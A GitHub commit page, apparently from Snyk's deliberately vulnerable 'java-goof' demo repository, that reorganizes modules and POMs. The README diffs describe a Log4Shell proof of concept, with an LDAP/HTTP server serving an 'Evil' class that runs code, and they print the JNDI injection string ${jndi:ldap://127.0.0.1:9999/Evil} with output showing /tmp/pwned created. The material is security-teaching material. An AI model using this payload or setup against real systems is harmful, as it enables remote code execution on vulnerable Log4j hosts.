Skip to content

Commit

Permalink
broke dependency of child modules on root parent. moved Dockerfile in…
Browse files Browse the repository at this point in the history 
…to todolist-goof module. Updated todolist poms to reference correct versions in dependencies.
  • Loading branch information
@dogeared
dogeared committed Dec 16, 2021
1 parent 9c0df1f commit 29b3e02
Show file tree
Hide file tree
Showing 9 changed files with 18 additions and 117 deletions.
100 changes: 5 additions & 95 deletions README.md
View file
Original file line number Diff line number Diff line change
@@ -1,98 +1,8 @@
## Log4Shell Proof of Concept
## Java Goof

The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`.
This is a collection of Java demo apps that are vulnerable in different ways.

This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/).
The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo.
It's divided into modules, each one having its own README:

For more information about the exploit and the mechanics of how it works,
[here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/).

### Requirements

You'll need one of the following Java SDKs:
* 11.0.1 or earlier
* 8u191 or earlier
* 7u201 or earlier
* 6u211 or earlier

Java SDKs newer than those versions don't have the same vulnerability.

### Building the PoC

In the root folder, run:

```
./mvnw clean install
```

**NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven.

### Running the PoC

This repo has two modules: server and client.

The server module runs a lean LDAP & HTTP server.

The LDAP server listens on port `9999` by default and will return an `LDAPResult` that includes a URL reference to a
Java class that will be deserialized and executed.

The HTTP server listens on port `8000` and responds to any request with a byte array that is the `Evil.class`.

`Evil` implements `ObjecFactory` which the JNDI mechanism hooks into to execute its `getObjectInstance` method. While
the method simply returns `null`, it uses `Runtime` to execute arbitrary code on the host machine. In this case, it
writes to a file called: `/tmp/pwned` to prove that it _could_ execute basically anything available on the machine.

This PoC should run as-is on Linux or Mac.

Open a terminal window and run the following:

```
cd log4shell-server
../mvnw exec:java -Dexec.mainClass="Server"
```

You should see output that looks like the following:

```
[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-server ---
LDAP server listening on 0.0.0.0:9999
HTTP server listening on 0.0.0.0:8000
```

In another terminal window, run the following:

```
cd log4shell-client
JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \
../mvnw exec:java -Dexec.mainClass="Main"
```

**NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions.
For example, you can download JDK 8u111
[here](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html). If you download
and install the version for Mac, the above command will work for you.

You should see output that looks like the following:

```
[INFO] --- exec-maven-plugin:3.0.0:java (default-cli) @ log4shell-client ---
---------- JVM Props -------------
java.vm.version=25.111-b14
java.vm.vendor=Oracle Corporation
java.vm.name=Java HotSpot(TM) 64-Bit Server VM
java.vm.specification.name=Java Virtual Machine Specification
java.vm.specification.vendor=Oracle Corporation
java.vm.specification.version=1.8
java.vm.info=mixed mode
---------------------------------
20:27:49.676 [Main.main()] ERROR Main - test
/tmp/pwned DOES NOT EXIST
20:27:49.679 [Main.main()] ERROR Main - Output:${jndi:ldap://127.0.0.1:9999/Evil}
/tmp/pwned EXISTS - yah been pwned!
```

**NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the
`/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the
client app to work properly. The file not being there and then being present after the attack is how it knows it's
been successful.
* [Todolist Goof](todolist-goof/README.md)
* [Log4Shell Goof](log4shell-goof/README.md)
13 changes: 8 additions & 5 deletions log4shell-goof/README.md
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,10 @@
## Log4Shell Proof of Concept
## Log4Shell Goof

The purpose of this project is to demonstrate the Log4Shell exploit with Log4J versions older than `2.15.0`.

This repo is based on the excellent proof-of-concept published by [BrianV](https://github.com/bmvermeer/log4jexploit/).
The PoC is a great starting point. This project expands on it by fleshing it out into a fully standalone demo.

For more information about the exploit and the mechanics of how it works,
[here is a good blog post](https://snyk.io/blog/log4j-rce-log4shell-vulnerability-cve-2021-4428/).

Expand All @@ -20,7 +23,7 @@ Java SDKs newer than those versions don't have the same vulnerability.
In the root folder, run:

```
./mvnw clean install
mvn clean install
```

**NOTE:** This project includes the Maven wrapper, so you don't need to have previously installed Maven.
Expand All @@ -46,7 +49,7 @@ Open a terminal window and run the following:

```
cd log4shell-server
../mvnw exec:java -Dexec.mainClass="Server"
mvn exec:java -Dexec.mainClass="Server"
```

You should see output that looks like the following:
Expand All @@ -62,7 +65,7 @@ In another terminal window, run the following:
```
cd log4shell-client
JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_111.jdk/Contents/Home \
../mvnw exec:java -Dexec.mainClass="Main"
mvn exec:java -Dexec.mainClass="Main"
```

**NOTE:** Referencing `JAVA_HOME` is important as the exploit only fully works with older JDK versions.
Expand Down Expand Up @@ -92,4 +95,4 @@ java.vm.info=mixed mode
**NOTE**: The client app will tell you if it was successful. It does some checks, including looking for the
`/tmp/pwned` file before and after the attack. You MUST delete the `/tmp/pwned` file between runs in order for the
client app to work properly. The file not being there and then being present after the attack is how it knows it's
been successful.
been successful.
Binary file modified log4shell-goof/log4shell-server/target/classes/Server$OperationInterceptor.class
View file
Binary file not shown.
6 changes: 0 additions & 6 deletions log4shell-goof/pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,12 +2,6 @@
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<parent>
<artifactId>java-goof</artifactId>
<groupId>io.github.snyk</groupId>
<version>1.0-SNAPSHOT</version>
</parent>

<groupId>io.snyk</groupId>
<artifactId>log4shell-poc</artifactId>
<version>0.0.1-SNAPSHOT</version>
Expand Down
4 changes: 2 additions & 2 deletions Dockerfile → todolist-goof/Dockerfile
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,7 +8,7 @@ RUN --mount=target=$HOME/.m2,type=cache mvn install
FROM tomcat:8.5.21

RUN mkdir /tmp/extracted_files
COPY --chown=tomcat:tomcat todolist-goof/web.xml /usr/local/tomcat/conf/web.xml
COPY --from=build /usr/src/goof/todolist-goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist
COPY --chown=tomcat:tomcat web.xml /usr/local/tomcat/conf/web.xml
COPY --from=build /usr/src/goof/todolist-web-struts/target/todolist /usr/local/tomcat/webapps/todolist
COPY --from=build /usr/local/openjdk-8/bin/native2ascii /docker-java-home/jre/bin/native2ascii
COPY --from=build /usr/local/openjdk-8/lib/tools.jar /docker-java-home/jre/lib/tools.jar
2 changes: 1 addition & 1 deletion todolist-goof/README.md
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
## Java Goof
## Todolist Goof

A vulnerable demo application, initially based on [Ben Hassine](https://github.com/benas/)'s [TodoMVC](https://github.com/benas/todolist-mvc).

Expand Down
6 changes: 0 additions & 6 deletions todolist-goof/pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,12 +2,6 @@
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<parent>
<artifactId>java-goof</artifactId>
<groupId>io.github.snyk</groupId>
<version>0.0.1-SNAPSHOT</version>
</parent>

<groupId>io.github.snyk</groupId>
<artifactId>todolist-mvc</artifactId>
<version>0.0.1-SNAPSHOT</version>
Expand Down
2 changes: 1 addition & 1 deletion todolist-goof/todolist-web-common/pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -38,7 +38,7 @@
<dependency>
<groupId>io.github.snyk</groupId>
<artifactId>todolist-core</artifactId>
<version>1.0-SNAPSHOT</version>
<version>0.0.1-SNAPSHOT</version>
</dependency>

<!-- javaee web api -->
Expand Down
2 changes: 1 addition & 1 deletion todolist-goof/todolist-web-struts/pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -21,7 +21,7 @@
<artifactId>javaee-web-api</artifactId>
</exclusion>
</exclusions>
<version>1.0-SNAPSHOT</version>
<version>0.0.1-SNAPSHOT</version>
</dependency>

<!-- javaee web api -->
Expand Down

0 comments on commit 29b3e02

Please sign in to comment.